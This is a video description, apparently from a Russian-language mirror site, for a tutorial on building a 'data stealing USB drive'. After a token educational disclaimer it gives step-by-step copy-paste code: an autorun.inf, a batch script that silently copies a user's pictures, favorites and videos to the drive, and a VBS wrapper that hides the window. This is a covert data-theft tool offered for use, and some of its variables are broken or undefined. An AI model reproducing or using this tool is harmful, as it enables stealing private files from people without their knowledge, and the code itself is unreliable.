How to create data stealing USB drive

Описание к видео How to create data stealing USB drive

DISCLAIMER --- WARNING:
NOTE: THIS VIDEO IS ONLY FOR EDUCATIONAL PURPOSE AND THIS CHANNEL DO NOT SUPPORT ANY ILLEGAL HACKING ACTIVITIES.

This video is only for educational purpose ... don't use it to create problem for yourself and for others ... please be safe ... thank you .. Please Subscribe..
In this video we will create a data stealing USB that copy users data silently without giving any notification.

Copy code from down blow :

STEP # 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf


STEP # 2

Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls

Save this as file.bat

STEP # 3

Open Notepad once again and copy-paste the following line.

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

Save this as invisible.vbs


STEP # 4

Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat

Save this as launch.bat

Комментарии

Информация по комментариям в разработке